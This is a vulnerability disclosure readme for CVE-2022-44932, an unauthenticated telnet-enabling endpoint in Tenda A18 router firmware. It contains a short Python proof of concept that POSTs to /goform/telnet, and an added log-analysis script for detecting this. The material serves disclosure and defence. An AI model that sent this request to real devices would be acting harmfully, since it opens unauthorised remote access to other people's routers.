
CVE-2022-44932: IOT_Vul/readme.md at main · z1r00/IOT_Vul

An access control issue in Tenda A18 v15.13.07.09 allows unauthenticated attackers to access the Telnet service.


Tenda A18 V15.13.07.09 Unauthorized opening of telnet service

Firmware information

  • Manufacturer’s address: https://www.tenda.com.cn/

  • Firmware download address: https://www.tenda.com.cn/download/detail-2760.html

Affected version

Vulnerability details

A request to /goform/telnet starts the telnet service without any authorization check.

PoC

import requests

# Device address used in the original report
url = "http://192.168.10.104/goform/telnet"
# POST sent with no credentials or session cookie
r = requests.post(url)
print(r.content)

You can see that the telnet service is enabled.
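For defenders, one way to spot this in network logs, as an added example that is not part of the original advisory: it flags any HTTP request to /goform/telnet (the method is not checked, a conservative assumption) and links later TCP port 23 connections to the same device. The log format, the function names and every address other than 192.168.10.104 are constructed assumptions.

```python
from datetime import datetime

# Constructed sample in a hypothetical "time src dst proto detail" log format.
SAMPLE_LOG = """\
2024-01-10T09:00:01 10.0.0.5 192.168.10.104 HTTP POST /goform/telnet
2024-01-10T09:00:09 10.0.0.5 192.168.10.104 TCP dport=23
2024-01-10T09:05:00 10.0.0.7 192.168.10.104 HTTP GET /index.html
2024-01-10T09:06:00 10.0.0.7 192.168.10.105 TCP dport=23
2024-01-10T09:30:00 10.0.0.8 192.168.10.105 HTTP GET /goform/telnet?x=1
garbled line
"""

def parse(line):
    """Split one line into (time, src, dst, proto, detail); None if malformed."""
    parts = line.split(None, 4)
    if len(parts) != 5:
        return None
    try:
        ts = datetime.fromisoformat(parts[0])
    except ValueError:
        return None
    return ts, parts[1], parts[2], parts[3], parts[4]

def is_enable_request(proto, detail):
    """True for an HTTP request whose path is /goform/telnet (query ignored)."""
    fields = detail.split()
    if proto != "HTTP" or len(fields) < 2:
        return False
    path = fields[1].split("?", 1)[0].rstrip("/")
    return path.lower() == "/goform/telnet"

def find_exposures(log_text):
    """Map each device to who hit the endpoint and who used telnet afterwards."""
    findings = {}
    events = sorted(filter(None, map(parse, log_text.splitlines())), key=lambda e: e[0])
    for ts, src, dst, proto, detail in events:
        if is_enable_request(proto, detail):
            entry = findings.setdefault(dst, {"enabled_by": [], "telnet_after": []})
            entry["enabled_by"].append((ts, src))
        elif proto == "TCP" and detail == "dport=23" and dst in findings:
            findings[dst]["telnet_after"].append((ts, src))
    return findings

if __name__ == "__main__":
    for device, hit in find_exposures(SAMPLE_LOG).items():
        print(device, "enabled_by:", [s for _, s in hit["enabled_by"]],
              "telnet_after:", [s for _, s in hit["telnet_after"]])
```

A device that appears with a non-empty `telnet_after` list had the endpoint requested and then received a telnet connection, which is the sequence to triage first.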
